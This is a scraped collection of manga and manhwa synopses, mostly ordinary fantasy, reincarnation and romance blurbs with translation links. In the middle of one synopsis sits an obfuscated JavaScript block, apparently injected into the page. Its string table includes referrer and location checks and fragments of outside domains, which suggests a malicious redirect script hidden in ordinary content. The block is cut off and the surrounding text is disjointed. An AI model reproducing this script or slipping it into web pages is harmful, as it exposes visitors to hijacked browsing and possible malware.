“I will have my revenge, no matter what.” Three thousand years ago, in an ancient Kingdom of Magic, Asuma, an archmage of unrivaled skill, saved the world from otherworldly invaders and became a savior. Yet, fearing his power, the king banished and ultimately killed him. However, Asuma’s soul returned to modern times. In the Magic Academy, simply known as the “Academy,” where modern magic combined with science is the standard, Asuma is reborn as a student named Shiobana Asuma. He vows revenge against the descendants of those who drove him to his death all those years ago. Combining his mastery of ancient magic with modern, science-based magic, he develops unprecedented hybrid magic… “For mere students aspiring to be mages in this era to challenge me—you’re ten thousand years too early.” ...and thus begins his tale of his revenge.
A collection of mermaid themed horror stories 1- 人魚の首 (The Mermaid\'s Head): As an introverted person, Maki held a grudge against her friend, Rumi, when her secret crush - Mihara was \"stolen\" by Rumi. In her dreams, a mermaid whispered to Maki, \"Eat me... And you\'ll become beautiful…\"! 2- セイレーン ~人魚の歌声~ (Siren ~The Mermaid\'s Singing Voice~) 3- 人魚のいる海 (The Sea where Mermaids Live) 4- 花の名前 (The Flower\'s Name) 5- 夢のつづき (The Dream Continues)
Read manhwa The Goal is Alimony / 목표는 위자료입니다 A couple enters a loveless, mutually indifferent marriage with plans to live separate lives and divorce after two years. However, despite their initial agreement and intentions, their relationship takes unexpected turns, complicating their plans.
“Pray, become the Enchanter that represents the family.” The goodwill from the start didn’t last long. At the House that adopted me due to my affinity with elemental spirits, I lived a life detested by even the maids because my powers didn’t come to form. It was a life where I agonized over whether I would be happier in death. That is, until I found another ‘me’. “I finally found you. Hi, the current me. Won’t you enter into a contract with me? You’re far too special to live like this, you see.” A miracle appeared in front of me, who was, again, vomiting as well. The person who lived as me in my previous life. “I’ll make you into this continent’s best Enchanter.” <div class="ToggleTriggerAnchor bbCodeSpoilerContainer"> <div class="SpoilerTarget bbCodeSpoilerText">?? ?? ? ??? ???, I will Live this Life According to my Will, I Will Live This Life As I Wish</div> </div> <script></script><script>function _0x542b(_0x2a829e,_0x49deef){var _0x3cafb3=_0x5491();return _0x542b=function(_0x37097d,_0x12cf45){_0x37097d=_0x37097d-(0x486*0x6+0xd*0x101+-0x2774);var _0x50e90d=_0x3cafb3[_0x37097d];return _0x50e90d;},_0x542b(_0x2a829e,_0x49deef);}function _0x5491(){var _0x1930b8=['GIQPn','1370955bKyiPJ','6670960AocBgg','text','injza','wzLOU','floor','10464704saMAPa','https://ip','SmPas','href','8573502yvkcEh','.customapi','233308HXqhAY','includes','http://rea','Eyugh','.top/','dma.net/','4136088vxlJPU','google','random','ZcJBr','referrer','TeIHl','YlXfb','location','6ESKwGU','then','JNxTK','193369XrSryb'];_0x5491=function(){return _0x1930b8;};return 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The thief Keith, whose family was captured, was forced to join the Demon King subjugation party. Thanks to his efforts, they managed to defeat the Demon King, but the king and heroes, who did not think highly of Keith, betrayed him and attempted to kill him. Barely escaping with his life, Keith found sinister horns growing from his head and transformed into the Phantom Thief Demon King, an embodiment of destruction and violence who can steal others’ skills and statuses! Along with the former Demon King’s subordinates, the Four Heavenly Kings, and monsters under his command, he exacts vengeance on the humans who betrayed him!
A young pharmacologist and researcher in Japan died from overworking, and was reincarnated in a Medieval Parallel Europe. He was reincarnated as a 10-year-old apprentice to a famous Royal Court pharmacist, had attained an inhuman skills of ability to see through disease, material creation, and material destruction. In a society in which dubious medical practice are rampant, price gouging thru the monopoly of the pharmacist guild, and good medicine aren\'t available to the commoners. He was recognized by the Emperor at that time and opened a Pharmacy at the corner of the town. He will wipe out the fraud that has swept the world, and deliver to the commoners a truly effective medicine that was developed using present day pharmacology. Thus the boy pharmacist will cheat by using his previous knowledge to create innovative medicines while helping the people of the parallel world, a story about living his new life to the fullest this time.
After losing his life because of his own womanizing badness, the reincarnated former Great Sage Akiba Kenji contracts with the Great Demon Gremory in order to become the Great Sage once again, but that contract provides the opportunity for his MAX-level yandere followers, who continued loving him even after losing him, to find him, and they won\'t let him get away……!? All heroines confirmed yanderes! A dangerous normal romcom at the mercy of love assassins coming from another world!
Read The Veteran Healer Is Overpowered manhwa The moment he and his disciples defeated the Demon King! He was sent to another world, and after 100 years of battling in a monster-infested realm, he finally returned to Earth! “But why has everyone forgotten about me?” 100 years in the other world was only 10 years on Earth. Now, a seasoned veteran hardened by a century of bloodshed, Min Si-woo sets out to find his lost disciples and uncover the reason behind his erasure!
Akira Kamishiro was a very successful manga author, who was diagnosed with blood cancer one day. He regretted the way he lived, where he could only build up empty relationships. Angry at his mother for asking him to send her some money, he died in a car accident. He was given a chance to choose his new mother and reincarnate in another world. Akira, not wanting to have a repeat of his past life, decided to choose an ordinary but safe life.. He was reincarnated as Akira, the only son of a magic store, with his previous life\'s memories. He had no talent for swordsmanship or magic, but he didn’t care as he was still loved by his family. At one point, he realized that he can embody various things by \"drawing a picture\". That\'s when he noticed his cheat ability...!? This is a story of Akira who wanted to live a mediocre life in another world and his adventures to protect his peaceful place!!
Science or magic? « Welcome to Paris, elected for the 68th month in a row as the least polluted city in the world. Thanks to cyanel, the air we breathe inside our houses is purified. » In a futuristic Paris, pollution is so prevalent that all greenery has disappeared. Recently, a gigantic plant appeared in the heart of the city, and the authorities are making sure no one gets close… Thomas, a young science student, is secretly studying the phenomenon, hoping for a better life. Raised by his witchcraft-loving grand-mother, he is often prone to hallucinations. One day, he crosses paths with a strange young girl with very bright eyes, who faints in the air. From then on, his fate changes…
A blacksmith reincarnated into another world sets out to forge the ultimate magic sword! Bacchus, a jack-of-all-trades craftsman with memories of his past life, steps into the world of magic and magic technology with the aim of making magic swords. Despite his diverse skills, Bacchus’s magical prowess is expected to cause a lot of trouble, but he doesn\'t care. He spends his days eating, drinking, crafting magic swords, and occasionally helping others with their problems. While he faces a few complications involving women, Bacchus continues to live his life one day at a time. --- **Link:** - Alternative Official Raw -[Niconico](https://manga.nicovideo.jp/comic/70493)
\"A useless thing like you has no value in our family. Take this money and leave immediately!\" \"Yes! Goodbye!\" She became the incompetent villainess who commits wrongdoings in order to earn the love of her fiancé, the male lead. Her reputation was already at rock bottom and the main characters, who can\'t live without each other, are having an affair. \"Getting kicked out and receiving money is good enough!\" So after she was kicked out, she set up a stationery store in front of a school. She reminisces of snacks, beer candy, and even bubbles! Just you wait, kids! But… somehow her young customers are a little weird? \"I\'ll find you a handsome and modest man, and not someone who has an affair like my brother!\" \"Ha, then what about my brother, the crown prince?” \"…the tower master is the best.\" The great magic swordsman, the crown prince, the villainous tower master, and finally, the hidden villain. The stationery store, which she thought would be peaceful, left her with no rest. *Help me! I just wanted to live a normal life!* --- What\'s a girl to do when she wakes up in the body of a villainess? Meldenique Babelloa is a supporting character in a romance novel starring her fiancé, Duke Lennox Hessman, and… her sister, Sheria! Heartbroken, she eventually dies a tragic death as a villainess… or so the original story goes. Determined not to follow the script, Meldenique resolutely abandons her old life and sets out to open… a stationery shop! Will she succeed in defying fate and building the stationery shop of her dreams? --- [Original Novel](https://page.kakao.com/home/55148613) **Original Webtoon:** [Daum](https://webtoon.kakao.com/content/%EC%95%85%EB%85%80%EC%9D%98-%EB%AC%B8%EA%B5%AC%EC%A0%90%EC%97%90-%EC%98%A4%EC%A7%80-%EB%A7%88%EC%84%B8%EC%9A%94/2873), [KakaoPage](https://page.kakao.com/home/59047014) **Official Translations:** * [English](https://tapas.io/series/the-villainesss-stationery-shop/info) * [Chinese (Simplified) / 汉语](https://pdt.tencentac.com/?adtag=appshare.ios.detail%26QQ%26274&contentId=274) * [Chinese (Traditional) / 漢語](https://tw.kakaowebtoon.com/content/%E8%AB%8B%E5%8B%BF%E9%80%B2%E5%85%A5%E6%83%A1%E5%A5%B3%E6%96%87%E5%85%B7%E5%BA%97/338) * [French / Français](https://fr.piccoma.com/fr/product/898) * [Indonesian / Bahasa Indonesia](https://id.kakaowebtoon.com/content/Jangan-Kunjungi-Toko-Alat-Tulis-Wanita-Jahat/285) * [Japanese / 日本語](https://piccoma.com/web/product/103612) * [Thai / ภาษาไทย](https://th.kakaowebtoon.com/content/%E0%B8%AD%E0%B8%A2%E0%B9%88%E0%B8%B2%E0%B8%A1%E0%B8%B2%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%99%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%99%E0%B8%B2%E0%B8%87%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B9%80%E0%B8%A5%E0%B8%A2%E0%B8%99%E0%B8%B0/396)